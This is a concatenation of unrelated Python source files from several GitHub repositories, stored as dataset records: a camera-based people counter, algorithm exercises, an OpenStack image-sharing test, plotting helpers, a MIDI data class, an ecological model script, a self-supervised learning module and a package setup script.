COUNT_PEOPLE_FRAMEOUT(dataPre, dataCur, frame, frameCopy, num_people):\r\n # create lists of all box coordinates in previous and current frame\r\n prev_coordlist=[]\r\n for j in range(len(dataPre.xyxy[0])):\r\n prev_coords=box_coords(dataPre.xyxy[0][j])\r\n prev_coordlist+=[prev_coords]\r\n coordlist=[]\r\n for k in range(len(dataCur.xyxy[0])):\r\n coords=box_coords(dataCur.xyxy[0][k])\r\n coordlist+=[coords]\r\n \r\n for c in coordlist:\r\n cv2.rectangle(frameCopy,(c[0],c[1]),(c[2],c[3]),(255,0,0),thickness=-1)\r\n \r\n # list of boxes that have corresponding boxes in previous frame\r\n i_list=matchboxes(coordlist, prev_coordlist, width)\r\n \r\n # get list of boxes that are new in the frame\r\n new_list=newbox(coordlist,i_list)\r\n \r\n # get list of boxes that have disappeared\r\n disp_list=dispbox(prev_coordlist,i_list)\r\n \r\n # adjust number of people and draw rectangles\r\n for new_coords in new_list:\r\n if checkbot_box(new_coords,height)==1:\r\n num_people-=1\r\n cv2.rectangle(frameCopy,(new_coords[0],new_coords[1]),(new_coords[2],new_coords[3]),(0,0,255),thickness=-1)\r\n \r\n for disp_coords in disp_list:\r\n if checkbot_box(disp_coords,height)==1:\r\n num_people+=1\r\n 
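# a box that disappeared while touching the bottom edge means someone walked in; mark it green\r\n            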
cv2.rectangle(frameCopy,(disp_coords[0],disp_coords[1]),(disp_coords[2],disp_coords[3]),(0,255,0),thickness=-1)\r\n \r\n # add the rectangles to the frame\r\n frame=cv2.addWeighted(frameCopy,0.3,frame,0.7,1.0)\r\n\r\n return frame, num_people\r\n\r\n\r\n\r\n\r\n\r\nimport RPi.GPIO as GPIO\r\nGPIO.setmode(GPIO.BCM)\r\npin_num = 21\r\nGPIO.setup(pin_num, GPIO.OUT, initial=GPIO.LOW)\r\n\r\ndef GPIO_LIGHT(numPeople, frame):\r\n if numPeople > 0: GPIO.output(pin_num, GPIO.HIGH)\r\n else: GPIO.output(pin_num, GPIO.LOW)\r\n\r\n cv2.circle(frame, (int(width*0.9), int(height*0.9)), radius=31, color=(0,0,0), thickness=cv2.FILLED) \r\n if numPeople > 0: \r\n cv2.putText(frame, 'ON' ,(int(width*0.865), int(height*0.92)), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 255, 255), 2) \r\n \r\n\r\n\r\n\r\n\r\n \r\nresultFINAL = cv2.VideoWriter('demovideo.avi', cv2.VideoWriter_fourcc(*'XVID'), cap.get(cv2.CAP_PROP_FPS), (width, height)) # 3 is FPS / cap.get(cv.CAP_PROP_FPS)\r\n\r\nwhile(1):\r\n frameno+=1\r\n _, frame = cap.read()\r\n \r\n # create frames for color filling in\r\n rect_frame=frame.copy()\r\n\r\n\r\n results = model(frame)\r\n if frameno==1:\r\n prev_results=results\r\n \r\n\r\n\r\n frame, num_people = COUNT_PEOPLE_FRAMEOUT(prev_results, results, frame, rect_frame, num_people)\r\n\r\n # send rasp GPIO command \r\n GPIO_LIGHT(num_people, frame)\r\n\r\n\r\n fpsEnd = time.time()\r\n timeDiff = fpsEnd - fpsStart\r\n fps = 1/timeDiff\r\n fpsStart = fpsEnd\r\n\r\n fpsText = \"FPS: {:2.2f}\".format(fps)\r\n cv2.putText(frame, fpsText, (int(width/40), int(height/15)), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 255, 255), 2) \r\n\r\n num_peopletxt=\"Number of people entered: \"+str(num_people)\r\n if num_people>0:\r\n cv2.putText(frame, num_peopletxt, (int(width/40), height-int(width/40)), cv2.FONT_HERSHEY_COMPLEX, 0.8, (255, 255, 255), 2)\r\n else:\r\n cv2.putText(frame, num_peopletxt, (int(width/40), height-int(width/40)), cv2.FONT_HERSHEY_COMPLEX, 0.8, (255, 255, 0), 2)\r\n \r\n cv2.namedWindow(\"result\", cv2.WINDOW_NORMAL)\r\n cv2.imshow(\"result\", frame)\r\n \r\n\r\n resultFINAL.write(frame)\r\n\r\n\r\n prev_results=results\r\n \r\n k = cv2.waitKey(5) & 0xFF\r\n if k == 27:\r\n GPIO.output(pin_num, GPIO.LOW)\r\n GPIO.cleanup()\r\n break\r\n if k == 114 or k == 82:\r\n num_people = 0\r\n\r\n\r\ncap.release()\r\nresultFINAL.release()\r\n\r\ncv2.destroyAllWindows()\r\n","repo_name":"SungJooo/DLIP_FINAL","sub_path":"DLIP_Final_10_LAST.py","file_name":"DLIP_Final_10_LAST.py","file_ext":"py","file_size_in_byte":6294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15875546916","text":"'''\n문제 요약\n내부요소를 삭제함으로써 전투력이 내림차순으로 정렬되도록 함\n최대한 많은 인원이 구성되어있도록 함\n열외시켜야하는 병사의 수 출력하기\n\n논리\n- LDS(Longest Decreasing Subsequence)\n- 현재의 위치에서 이전의 요소들에 대해서 각 요소들이 가진 최장 감소 수와 비교\n- 각 위치는 이전에 어떤 경우로 만들어진 수인지와 상관없이 최장 감소 수를 저장하고 있다.\n- 현재 위치가 이전의 위치 요소 값과 비교하여 작다면, 각 이전의 요소 dp + 1 vs 현재 위치 dp\n- 작다면 갱신\n\n'''\nimport sys\nsys.stdin = open('input.txt')\n\n\nn = int(input())\narr = list(map(int, input().split()))\ndp = [1 for _ in range(n)]\n\nfor i in range(n):\n for j in range(i):\n if arr[j] > arr[i]:\n dp[i] = max(dp[i], dp[j] + 1)\nprint(n-max(dp))\n","repo_name":"WonilLee211/group_study_algorithm","sub_path":"APS/221026_DP/34_LWI_DP_placeSoldier.py","file_name":"34_LWI_DP_placeSoldier.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24652742604","text":"from 
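# The Korean docstring in the record above summarises the problem: remove
# soldiers so that combat power is strictly decreasing, keep as many as
# possible, and print how many must be removed. The answer is
# n - len(longest decreasing subsequence). A minimal sketch of that O(n^2) DP:
def min_removals_for_decreasing(arr):
    n = len(arr)
    dp = [1] * n                      # dp[i] = longest decreasing run ending at i
    for i in range(n):
        for j in range(i):
            if arr[j] > arr[i]:
                dp[i] = max(dp[i], dp[j] + 1)
    return n - max(dp) if n else 0

assert min_removals_for_decreasing([4, 2, 5, 3, 1]) == 2   # keep e.g. 4, 3, 1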
cafe.drivers.unittest.decorators import tags\nfrom cloudcafe.images.common.types import ImageMemberStatus\nfrom cloudroast.images.fixtures import ImagesFixture\n\n\nclass ForceUserToSeeMyImagesTest(ImagesFixture):\n\n @tags(type='positive', regression='true')\n def test_force_a_user_to_see_my_images(self):\n \"\"\"\n @summary: Force a user to see my images\n\n 1) Create an image as tenant\n 2) Verify that alternative tenant cannot access image_one\n 3) Add alternative tenant as a member of image (share image with\n alternative tenant)\n 4) Verify that alternative tenant can access image\n 5) Update alternative tenant membership status to 'Rejected',\n for image\n 6) Verify that alternative tenant is still able to access image\n directly\n \"\"\"\n\n alt_tenant_id = self.alt_tenant_id\n image = self.images_behavior.create_image_via_task()\n\n response = self.alt_images_client.get_image(image_id=image.id_)\n self.assertEqual(response.status_code, 404)\n\n response = self.images_client.add_member(image_id=image.id_,\n member_id=alt_tenant_id)\n self.assertEqual(response.status_code, 200)\n member = response.entity\n self.assertEqual(member.member_id, alt_tenant_id)\n self.assertEqual(member.status, ImageMemberStatus.PENDING)\n\n response = self.alt_images_client.get_image(image_id=image.id_)\n self.assertEqual(response.status_code, 200)\n get_image_resp = response.entity\n self.assertEqual(get_image_resp.id_, image.id_)\n\n response = self.alt_images_client.update_member(\n image_id=image.id_, member_id=alt_tenant_id,\n status=ImageMemberStatus.REJECTED)\n self.assertEqual(response.status_code, 200)\n updated_member = response.entity\n self.assertEqual(updated_member.member_id, alt_tenant_id)\n self.assertEqual(updated_member.status, ImageMemberStatus.REJECTED)\n\n response = self.alt_images_client.get_image(image_id=image.id_)\n self.assertEqual(response.status_code, 200)\n get_image_resp = response.entity\n self.assertEqual(get_image_resp.id_, image.id_)\n","repo_name":"jcourtois/rpc9_cloudroast","sub_path":"cloudroast/images/v2/functional/test_force_a_user_to_see_my_images.py","file_name":"test_force_a_user_to_see_my_images.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18731891298","text":"import sys\nm=int(sys.stdin.readline().strip())\nn=int(sys.stdin.readline().strip())\narr=[False,False]+[True]*(n+1)\nfor i in range(2,n+1):\n for j in range(i+i,n+1,i):\n if arr[j]:\n arr[j]=False\nresult=0+sum(i if arr[i] else 0 for i in range(m,n+1))\nprint(result if result!=0 else -1)\nif result!=0:\n for i in range(m,n+1):\n if arr[i]:print(i);break","repo_name":"beOk91/baekjoon2","sub_path":"baekjoon2581.py","file_name":"baekjoon2581.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14897538401","text":"import numpy as np\nimport matplotlib.pylab as plt\n\n\n\ndef imshow_color_diff(I, J):\n \"\"\"display I and J images superimposed on different color channels\n \"\"\"\n def norm_01(I):\n return (I - I.min())/I.ptp()\n Ic = np.dstack([norm_01(I)**0.5,\n norm_01(J)**0.5,\n 0.5*np.ones_like(J)])\n plt.imshow(Ic)\n\n\ndef plot_vector_field(points, displacements,\n view_factor=None, color='white'):\n amplitudes = np.sqrt(np.nansum(displacements**2, axis=1))\n\n mask = ~np.any(np.isnan(displacements), axis=1, keepdims=False)\n\n plt.quiver(*points[mask, :].T, *displacements[mask, :].T,\n 
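# Sketch of the sieve used in the baekjoon2581 record above: mark multiples
# as composite, then report the sum and the smallest prime in [m, n]
# (or -1 when the range holds no prime). Minimal re-implementation for clarity.
def primes_between(m, n):
    is_prime = [False, False] + [True] * (n - 1)   # indices 0..n
    for i in range(2, int(n ** 0.5) + 1):
        if is_prime[i]:
            for j in range(i * i, n + 1, i):
                is_prime[j] = False
    return [i for i in range(m, n + 1) if is_prime[i]]

ps = primes_between(60, 100)
print(sum(ps), min(ps) if ps else -1)   # 620 61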
angles='xy', color='white',\n scale_units='xy',\n units='dots',\n width=1,\n headwidth=3,\n headlength=4, headaxislength=3,\n scale=1/view_factor if view_factor else None,\n minlength=1e-4)\n\n plt.text(10., 10.,\n f'max(|u|)={np.nanmax(amplitudes):.2f}px mean(|u|)={np.nanmean(amplitudes):.2f}px',\n fontsize=12, color=color,\n verticalalignment='top')\n\n # plot NaN points\n plt.plot(points[np.logical_not(mask), 0],\n points[np.logical_not(mask), 1],\n 's', markersize=1, color='yellow', alpha=0.7)\n\n\ndef plot_grid_points(grid, background=None,\n color='white', markersize=3,\n show_pts_number=False,\n window_half_size=None):\n \"\"\"Plot grid points\n\n Parameters\n ----------\n grid : tuple (grid_x, grid_y)\n grid points arrays\n background : 2D array, by default None\n image to draw as a background\n color : str, by default 'white'\n markersize : int, by default 3\n show_pts_number : bool, by default False\n window_half_size : int, by default None\n if not None, draw one corresponding ROI box\n \"\"\"\n if background is not None:\n plt.imshow(background)\n\n plt.plot(*grid, 'o', color=color, markersize=markersize)\n\n if show_pts_number:\n points = np.stack((grid[0].flatten(), grid[1].flatten()),\n axis=-1)\n for k, (x, y) in enumerate(points):\n if len(points) > 10 and k % 5 != 0:\n continue\n text_offset = 10.0\n plt.text(x+text_offset, y+text_offset,\n str(k), fontsize=8, color=color)\n\n # Graph one of the ROI\n if window_half_size:\n box = np.array([[-1, 1, 1, -1, -1],\n [-1, -1, 1, 1, -1]])*(window_half_size + 1)\n middle_point = tuple(np.array(grid[0].shape) // 2 - 1)\n plt.plot(box[0]+grid[0][middle_point], box[1]+grid[1][middle_point],\n color=color, linewidth=1)\n\n\nfrom matplotlib.lines import Line2D\n\ndef plot_trajectories(trajectories, background=None, gaps=None,\n color='black'):\n if background is not None:\n plt.imshow(background, alpha=.4)\n\n for k, xy in enumerate(np.swapaxes(trajectories, 0, 1)):\n plt.plot(*xy[0], 's', color=color, markersize=1)\n plt.plot(*xy.T, '-', linewidth=.5, markersize=2, color=color)\n if k % 5 == 0:\n plt.text(*xy[0], str(k), fontsize=6)\n\n if gaps is not None:\n g = gaps[:, k] \n mask = ~np.isnan(g)\n mask[mask] &= g[mask] > 5\n plt.plot(*xy[1:-1, :][mask, :].T, 'o', markersize=2,\n color='red')\n plt.legend([Line2D([0], [0], linestyle='', marker='o', color='red', markersize=2),], ['gap > 5px', ])\n #plt.axis('equal')\n\n\ndef plot_deformed_mesh(grid, displ_field,\n color_values=None,\n view_factor=10,\n displ_threshold=True, cmap='Spectral'):\n \n if color_values is None:\n color_values = np.zeros_like(grid[0])\n \n # Scale displacements using view_factor\n points = np.stack( (grid[0].flatten(), grid[1].flatten()), axis=-1 )\n positions_amplified = displ_field*view_factor + points\n x_amplified = positions_amplified[:, 0].reshape(grid[0].shape)\n y_amplified = positions_amplified[:, 1].reshape(grid[0].shape)\n\n displ_field_amplified = view_factor * displ_field\n\n # Remove points where displacement > threshold\n if displ_threshold:\n diff_x = np.diff(x_amplified, axis=1, prepend=np.min(x_amplified)-10)\n diff_y = np.diff(y_amplified, axis=0, prepend=np.min(y_amplified)-10)\n displ_x_mask = np.less(diff_x, 0,\n where=~np.isnan(diff_x))\n displ_y_mask = np.less(diff_y, 0,\n where=~np.isnan(diff_y))\n displ_mask = np.logical_or(displ_x_mask, displ_y_mask)\n\n x_amplified[displ_mask] = np.NaN\n y_amplified[displ_mask] = np.NaN\n\n # Background Reference grid:\n moved_out = np.any(np.isnan(displ_field), axis=1).reshape(grid[0].shape)\n 
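# Minimal sketch of the NaN handling in plot_vector_field() above: rows whose
# displacement contains NaN are excluded from the quiver call and drawn
# separately as markers. Assumes (N, 2) arrays; not the original API.
import numpy as np
import matplotlib.pyplot as plt

points = np.array([[0., 0.], [1., 0.], [2., 0.]])
displ = np.array([[0.5, 0.2], [np.nan, np.nan], [0.1, -0.3]])

ok = ~np.any(np.isnan(displ), axis=1)
plt.quiver(*points[ok].T, *displ[ok].T, angles='xy', scale_units='xy', scale=1)
plt.plot(*points[~ok].T, 's', color='yellow')   # points where tracking failed
plt.show()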
ref_colors = np.zeros_like(moved_out)\n ref_colors[moved_out] = 1\n \n # note : pcolormesh doesn't work with NaN\n plt.pcolor(*grid, ref_colors, \n edgecolors='black', linewidth=1, antialiased=True,\n cmap='Reds', alpha=0.1)\n \n\n # Front mesh:\n cs = plt.pcolor(x_amplified, y_amplified, color_values,\n edgecolors='#2b2b2b',\n linewidth=1,\n antialiased=True,\n cmap=cmap)\n cs.cmap.set_over('gray')\n cs.cmap.set_under('gray')\n\n\n plt.annotate(f\"×{view_factor}\", (1, 1), xytext=(-5, -5),\n xycoords='axes fraction', textcoords='offset points',\n fontsize=14, fontweight='bold', ha='right', va='top')\n\n plt.axis('equal')\n plt.xlabel('x [pixel]'); plt.ylabel('y [pixel]'); ","repo_name":"xdze2/stretchablecorr","sub_path":"stretchablecorr/graphplot.py","file_name":"graphplot.py","file_ext":"py","file_size_in_byte":5778,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"4080330072","text":"import copy\nimport os\nimport numpy as np\nimport mido\n\nclass Songbook(object):\n\n def __init__(self):\n \n self._pieces = {}\n\n def add_new_piece(self, name):\n piece = Piece()\n self._pieces[name] = piece\n return piece\n\n def get_piece(self, name):\n return self._pieces[name]\n\n def remove_piece(self, name):\n del self._pieces[name]\n\n\nclass Piece(object):\n\n NOTES = np.asarray([i for i in range(88)])\n \n def __init__(self, max_len, data=None, midi_path=None):\n\n self._max_len = max_len\n if not data:\n self._data = []\n else:\n if not midi_path:\n self.add_bulk_note_data(data)\n else:\n self.import_midi(midi_path)\n self.scale_data\n\n @property\n def length(self):\n return len(self._data)\n\n @property\n def max_length(self):\n return self._max_len\n \n @property\n def notes(self):\n return [data[0] for data in self._data]\n\n @property\n def scaled_notes(self):\n return [data[0] for data in self._scaled_data]\n\n @property\n def velocities(self):\n return [data[1] for data in self._data]\n\n @property\n def scaled_velocities(self):\n return [data[1] for data in self._scaled_data]\n\n @property\n def times(self):\n return [data[2] for data in self._data]\n\n @property\n def scaled_times(self):\n return [data[2] for data in self._scaled_data]\n\n def copy(self, deep=True):\n if deep:\n return copy.deepcopy(self)\n else:\n return copy.copy(self)\n\n def scale_data(self):\n max_time = max(self.times)\n\n scaled_notes = [(data[0] - 24) / 88 for data in self._data] # subtract 24 because midi keyboard\n scaled_velocities = [data[1] / 127 for data in self._data]\n scaled_times = [data[2] / max_time for data in self._data]\n\n self._scaled_data = list(zip(scaled_notes, scaled_velocities, scaled_times))\n \n def add_note_data(self, note, velocity, time):\n self._data.append((note, velocity, time))\n\n def add_bulk_note_data(self, data):\n self._data.extend(data)\n\n def import_midi(self, midi_path):\n mid = mido.MidiFile(midi_path)\n for track in mid.tracks:\n time = float(0)\n previous = float(0)\n notes = []\n for msg in track:\n time += msg.time\n if not msg.is_meta and msg.type == 'note_on':\n note = msg.bytes()\n note = note[1:3]\n note.append(time - previous)\n previous = time\n notes.append(note)\n\n self.add_bulk_note_data(notes)\n\nif __name__ == '__main__':\n sb = Songbook()\n piece = sb.add_new_piece('test')\n piece.import_midi('../midis/chpn_op27_1_format0.mid')\n \n piece = sb.get_piece('test')\n\n print(len(piece.notes))\n print(max(piece.notes), max(piece.scaled_notes))\n print(max(piece.velocities), 
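# Sketch of the scaling convention in the Piece class above: MIDI note
# numbers are shifted by 24 (the lowest key used in this dataset's keyboard
# range) and divided by 88, velocities by the MIDI maximum 127, and delta
# times by the largest delta in the piece. Illustrative only.
def scale_note(note, velocity, dt, max_dt):
    return ((note - 24) / 88.0, velocity / 127.0, dt / max_dt)

notes = [(60, 100, 0.0), (64, 90, 0.5), (67, 80, 1.0)]
max_dt = max(t for _, _, t in notes)
print([scale_note(*n, max_dt=max_dt) for n in notes])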
max(piece.scaled_velocities))\n print(max(piece.times), max(piece.scaled_times))\n print(min(piece.notes), min(piece.scaled_notes))\n print(min(piece.velocities), min)\n print(min(piece.times))\n \n \n\n\n \n","repo_name":"doneill612/DeepKeysRL","sub_path":"deepkeys/songbook.py","file_name":"songbook.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20260397558","text":"import sys\r\nimport pickle\r\nfrom numpy.random import seed,normal\r\nfrom random import choices\r\nfrom numpy import average,exp\r\nfrom scipy.stats.mstats import mquantiles\r\nfrom numpy.random import normal,seed\r\n\r\n\r\nsys.path.append('c:/analyses/EFA_Productivity_Model.20180929/pyfunctions')\r\nfrom GetParamStats import GetParamValues2 as GetParamValues\r\nfrom GetCoastLength import GetCoastLength\r\n\r\ndef GetCoastLength(pickle_file):\r\n SiteNumber,Sites,VirginSites,CoastLength,timestamp=pickle.load(open(pickle_file,\"rb\"))\r\n return(CoastLength[0]+CoastLength[2]+CoastLength[4]+CoastLength[8]+CoastLength[16])\r\n\r\n \r\n\r\nclass USR2():\r\n def __init__(self, hdf5file,PickleFile,z=4,nquant=1000,burn=0,nthin=None,seed=None):\r\n\r\n self.sdYear=GetParamValues(hdf5file, 'sdYear',burn=burn,nthin=nthin)\r\n self.sdSite=GetParamValues(hdf5file, 'sdSite',burn=burn,nthin=nthin)\r\n n=len(self.sdYear)\r\n self.CoastLength=GetCoastLength(PickleFile)\r\n \r\n vbmass=[GetParamValues(hdf5file, t,burn=burn,nthin=nthin) for t in ['VBmass_0', 'VBmass_2', 'VBmass_4', 'VBmass_8', 'VBmass_16' ] ]\r\n self.vbmass=[ sum([t[i] for t in vbmass] ) for i in range(n) ]\r\n \r\n YearEffect=normal(0,self.sdYear)\r\n SiteEffect=normal(0,self.sdSite)\r\n self.USR21=[exp(-z*t) for t in self.sdYear ]\r\n self.USR22=[self.USR21[i]*self.vbmass[i]/self.CoastLength*exp(SiteEffect[i]+YearEffect[i]) for i in range(n)]\r\n \r\n q=[ (i+.5)/nquant for i in range(nquant)]\r\n result={}\r\n self.qUSR21=mquantiles(self.USR21,prob=q)\r\n self.qUSR22=mquantiles(self.USR22,prob=q)\r\n \r\n \r\n\r\nif __name__ == \"__main__\":\r\n sys.path.append('c:\\\\analyses\\\\EFA_Productivity_Model.20180929\\\\Jervis\\\\NewModel_wideSdYear_WideSiteArea')\r\n from hdf5file import hdf5file,burn,nthin,PickleFile\r\n hdf5file=hdf5file[0]\r\n SiteNumber,Sites,VirginSites,CoastLength,timestamp=pickle.load(open(PickleFile,\"rb\"))\r\n CL=GetCoastLength(PickleFile)\r\n \r\n test=USR2(hdf5file,PickleFile,nquant=1000,burn=burn,nthin=nthin,seed=20200424)\r\n","repo_name":"WayneHajas/Sea-Cucumber-Productivity-Model","sub_path":"USR2_Quantiles.py","file_name":"USR2_Quantiles.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23604121358","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchmetrics.functional import accuracy\n\nimport pytorch_lightning as pl\n\nfrom copy import deepcopy\nfrom typing import Callable, Tuple, Sequence, Union\n\nfrom kornia import augmentation as aug\n\nimport random\n\nclass RandomApply(nn.Module):\n def __init__(self, fn: Callable, p: float):\n super().__init__()\n self.fn = fn\n self.p = p\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n return x if random.random() > self.p else self.fn(x)\n\ndef default_augmentation(image_size: Tuple[int, int] = (32, 32)) -> nn.Module:\n return nn.Sequential(\n # aug.RandomHorizontalFlip(),\n aug.RandomCrop(size=image_size, padding=4, padding_mode='reflect'),\n 
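# Sketch of the quantile grid used in the USR2 record above: nquant
# mid-point probabilities (i + 0.5) / nquant, evaluated with scipy's
# mquantiles. Standalone toy version.
from scipy.stats.mstats import mquantiles
import numpy as np

samples = np.random.default_rng(0).normal(size=10_000)
nquant = 5
q = [(i + 0.5) / nquant for i in range(nquant)]   # 0.1, 0.3, 0.5, 0.7, 0.9
print(mquantiles(samples, prob=q))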
# aug.ColorJitter(brightness=0.4, contrast=0.4, saturation=0.4, hue=0.2),\n # aug.RandomGrayscale(p=0.1),\n )\n\nclass BarlowTwinsLoss(nn.Module):\n def __init__(self, batch_size, lambda_coeff=5e-3, z_dim=128):\n super().__init__()\n\n self.z_dim = z_dim\n self.batch_size = batch_size\n self.lambda_coeff = lambda_coeff\n\n def off_diagonal_ele(self, x):\n n, m = x.shape\n assert n == m\n return x.flatten()[:-1].view(n - 1, n + 1)[:, 1:].flatten()\n\n def forward(self, z1, z2):\n assert z1.shape == z2.shape\n # N x D, where N is the batch size and D is output dim of projection head\n z1_norm = (z1 - torch.mean(z1, dim=0)) / torch.std(z1, dim=0)\n z2_norm = (z2 - torch.mean(z2, dim=0)) / torch.std(z2, dim=0)\n\n # cross_corr = torch.matmul(z1_norm.T, z2_norm) / self.batch_size\n cross_corr = torch.matmul(z1_norm.T, z2_norm) / z1.shape[0]\n\n on_diag = torch.diagonal(cross_corr).add_(-1).pow_(2).sum()\n off_diag = self.off_diagonal_ele(cross_corr).pow_(2).sum()\n\n return on_diag + self.lambda_coeff * off_diag\n\nclass ProjectionHead(nn.Module):\n def __init__(self, input_dim=2048, hidden_dim=2048, output_dim=128):\n super().__init__()\n\n self.projection_head = nn.Sequential(\n nn.Linear(input_dim, hidden_dim, bias=True),\n nn.BatchNorm1d(hidden_dim),\n nn.ReLU(),\n nn.Linear(hidden_dim, output_dim, bias=False),\n )\n\n def forward(self, x):\n return self.projection_head(x)\n\nclass barlowBYOL(pl.LightningModule):\n def __init__(self, \n encoder, \n encoder_out_dim, \n image_size: Tuple[int, int], \n lr=3e-4, \n tau=0.99,\n ):\n \n super().__init__()\n self.augment = default_augmentation(image_size)\n\n self.lr = lr\n self.tau = tau\n\n self.encoder = encoder\n self.projection_head = ProjectionHead(input_dim=encoder_out_dim)\n self._target = None\n\n self.loss = BarlowTwinsLoss(batch_size=16)\n\n @property\n def target(self):\n if self._target is None:\n target_encoder = deepcopy(self.encoder)\n target_projection_head = deepcopy(self.projection_head)\n self._target = nn.Sequential(target_encoder, target_projection_head)\n return self._target\n \n def forward(self, x):\n return self.encoder(x)\n \n def training_step(self, batch, batch_idx):\n x = batch[0]\n\n with torch.no_grad():\n x1, x2 = self.augment(x), self.augment(x)\n target_y = self.target(x2)\n y = self.projection_head(self.encoder(x1))\n\n loss = self.loss(y, target_y)\n self.log(\"train_loss\", loss, on_step=True, on_epoch=False)\n return loss\n \n def validation_step(self, batch, batch_idx):\n x = batch[0]\n\n with torch.no_grad():\n x1, x2 = self.augment(x), self.augment(x)\n target_y = self.target(x2)\n y = self.projection_head(self.encoder(x1))\n\n loss = self.loss(y, target_y)\n\n self.log(\"val_loss\", loss, on_step=False, on_epoch=True)\n \n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.parameters(), lr=self.lr)\n return optimizer\n \n def on_after_backward(self):\n for online_param, target_param in zip(self.encoder.parameters(), self.target[0].parameters()):\n target_param.data = target_param.data * self.tau + online_param.data * (1 - self.tau)\n for online_param, target_param in zip(self.projection_head.parameters(), self.target[1].parameters()):\n target_param.data = target_param.data * self.tau + online_param.data * (1 - self.tau)\n\nclass LinearEvaluationCallback(pl.Callback):\n def __init__(\n self,\n encoder_output_dim: int,\n num_classes: int\n ):\n super().__init__()\n self.optimizer: torch.optim.Optimizer\n\n self.encoder_output_dim = encoder_output_dim\n self.num_classes = num_classes\n\n 
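# The off_diagonal_ele() trick in BarlowTwinsLoss above is worth unpacking:
# flattening an n x n matrix, dropping the last element, and viewing it as
# (n-1) x (n+1) pushes every diagonal entry into column 0, so slicing
# [:, 1:] keeps exactly the off-diagonal elements. Quick check:
import torch

x = torch.arange(9).reshape(3, 3)            # diagonal = 0, 4, 8
off = x.flatten()[:-1].view(2, 4)[:, 1:].flatten()
print(off.tolist())                          # [1, 2, 3, 5, 6, 7]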
def on_fit_start(self, trainer: pl.Trainer, pl_module: pl.LightningModule):\n pl_module.linear_classifier = nn.Linear(self.encoder_output_dim, self.num_classes).to(pl_module.device)\n self.optimizer = torch.optim.Adam(pl_module.linear_classifier.parameters(), lr=1e-4)\n\n def extract_batch(self, batch: Sequence, device: Union[str, torch.device]):\n x, y = batch\n x = x.to(device)\n y = y.to(device)\n\n return x, y\n \n def on_train_batch_end(\n self,\n trainer: pl.Trainer,\n pl_module: pl.LightningModule,\n outputs: Sequence,\n batch: Sequence,\n batch_idx: int\n ):\n x, y = self.extract_batch(batch, pl_module.device)\n\n with torch.no_grad():\n features = pl_module.forward(x)\n \n features = features.detach()\n preds = pl_module.linear_classifier(features)\n loss = F.cross_entropy(preds, y)\n\n loss.backward()\n self.optimizer.step()\n self.optimizer.zero_grad()\n\n pred_labels = torch.argmax(preds, dim=1)\n acc = accuracy(pred_labels, y, task=\"multiclass\", num_classes=10)\n pl_module.log(\"online_train_acc\", acc, on_step=True, on_epoch=False)\n pl_module.log(\"online_train_loss\", loss, on_step=True, on_epoch=False)\n\n def on_validation_batch_end(\n self,\n trainer: pl.Trainer,\n pl_module: pl.LightningModule,\n outputs: Sequence,\n batch: Sequence,\n batch_idx: int\n ):\n x, y = self.extract_batch(batch, pl_module.device)\n\n with torch.no_grad():\n features = pl_module.forward(x)\n \n features = features.detach()\n preds = pl_module.linear_classifier(features)\n loss = F.cross_entropy(preds, y)\n \n pred_labels = torch.argmax(preds, dim=1)\n acc = accuracy(pred_labels, y, task=\"multiclass\", num_classes=10)\n pl_module.log(\"online_val_acc\", acc, on_step=False, on_epoch=True, sync_dist=True)\n pl_module.log(\"online_val_loss\", loss, on_step=False, on_epoch=True, sync_dist=True)\n","repo_name":"VebjornBerstad/Barlow-twins-BYOL","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39168523390","text":"import os\nimport sys\nimport shutil\nimport pkgutil\nimport platform\nfrom setuptools import setup\nfrom setuptools_rust import RustExtension\n\ndef post_build():\n platform_str = platform.system()\n if platform_str == 'Windows':\n dylib_name = 'libfwnt.dll'\n elif platform_str == 'Linux':\n dylib_name = 'libfwnt.so'\n else:\n raise(Exception(\"{} platform is not handled.\".format(platform_str)))\n\n flag_64x = sys.maxsize > 2**32\n if flag_64x:\n dylib_fullname = os.path.join(\n os.environ['LIBFWNT_BIN64'],\n dylib_name\n )\n else:\n dylib_fullname = os.path.join(\n os.environ['LIBFWNT_BIN32'],\n dylib_name\n )\n\n if not os.path.isfile(dylib_fullname):\n dylib_fullname = os.path.join(\n os.environ['LIBFWNT_BIN'],\n dylib_name\n )\n if not os.path.isfile(dylib_fullname):\n raise(Exception(\"{} not found.\".format(dylib_fullname)))\n\n print(\"found {}\".format(dylib_fullname))\n package_dir = os.path.dirname(pkgutil.get_loader(\"pyrpf\").filename)\n\n print(\"found {}\".format(package_dir))\n dylib_newname = os.path.join(\n package_dir,\n dylib_name\n )\n\n shutil.copyfile(\n dylib_fullname,\n dylib_newname\n )\n\nsetup(\n name='pyrpf',\n version='0.1.0',\n rust_extensions=[\n RustExtension('pyrpf', 'Cargo.toml')\n ],\n 
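# Sketch of the exponential-moving-average target update performed in
# on_after_backward() above: target <- tau * target + (1 - tau) * online.
# Standalone toy version on plain tensors.
import torch

def ema_update(target_params, online_params, tau=0.99):
    with torch.no_grad():
        for t, o in zip(target_params, online_params):
            t.mul_(tau).add_(o, alpha=1.0 - tau)

target = [torch.zeros(3)]
online = [torch.ones(3)]
ema_update(target, online)
print(target[0])   # tensor([0.0100, 0.0100, 0.0100])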
